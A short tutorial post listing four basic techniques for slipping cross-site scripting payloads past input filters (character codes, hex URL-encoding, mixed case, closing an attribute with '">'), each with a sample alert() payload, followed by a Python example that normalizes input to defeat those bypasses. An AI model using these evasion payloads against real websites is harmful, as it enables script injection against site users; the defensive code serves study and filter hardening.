Four very basic bypass methods.
1. Convert to ASCII codes
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 39, 41)</script>

2. Convert to HEX (hexadecimal)
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%49%20%6c%6f%76%65%20%46%34%63%6b%27%29%3c%2f%73%63%72%69%70%74%3e

3. Change the case of the script
Example: the original script is <script>alert('I love F4ck')</script>
Converted to: <ScRipt>AleRt('I love F4ck')</sCRipT>

4. Add a closing marker ">
Example: the original script is <script>alert('I love F4ck')</script>
Converted to: "><script>alert('I love F4ck')</script>
For more detailed bypass techniques, see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
The conversion tool used is the HackBar Mozilla add-on for Firefox.
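As an added defensive example (not part of the original post): a Python check showing why a literal-match filter misses these variants and how canonicalizing input first (URL-decode, expand fromCharCode, fold case) collapses methods 1 to 3 to one string, while method 4 is answered by attribute-context output encoding. The function names naive_filter, canonicalize, normalized_filter and attribute_encode are my own; the sample inputs are the four payloads from the post.

```python
import html
import re
from urllib.parse import unquote

# The four obfuscated forms from the post, used here as constructed sample inputs.
SAMPLES = {
    "charcode": "<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 73, 32, "
                "108, 111, 118, 101, 32, 70, 52, 99, 107, 39, 41)</script>",
    "hex": "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%49%20%6c%6f%76%65%20"
           "%46%34%63%6b%27%29%3c%2f%73%63%72%69%70%74%3e",
    "case": "<ScRipt>AleRt('I love F4ck')</sCRipT>",
    "close": "\"><script>alert('I love F4ck')</script>",
}

def naive_filter(value: str) -> bool:
    """A weak filter: case-sensitive literal match on the raw input."""
    return "<script>" in value

# String.fromCharCode(97, 108, ...) with an arbitrary, possibly spaced, code list.
CHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]*)\)", re.IGNORECASE)

def _expand_charcode(match: re.Match) -> str:
    codes = [int(c) for c in match.group(1).replace(" ", "").split(",") if c]
    return "".join(chr(c) for c in codes)

def canonicalize(value: str) -> str:
    """Undo the obfuscations before matching: URL-decode until the value stops
    changing (this also covers double encoding), expand fromCharCode, fold case."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    value = CHARCODE_RE.sub(_expand_charcode, value)
    return value.lower()

def normalized_filter(value: str) -> bool:
    """Match on the canonical form, so methods 1 to 3 no longer slip past."""
    return "<script" in canonicalize(value)

def attribute_encode(value: str) -> str:
    """Method 4 is not an encoding trick: it closes the attribute the value is
    placed in. No input matching fixes that; encoding the value for the
    attribute context does, because the quote and angle brackets become inert."""
    return html.escape(value, quote=True)

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name:9} naive={naive_filter(payload)!s:5} normalized={normalized_filter(payload)}")
    print(attribute_encode(SAMPLES["close"]))
```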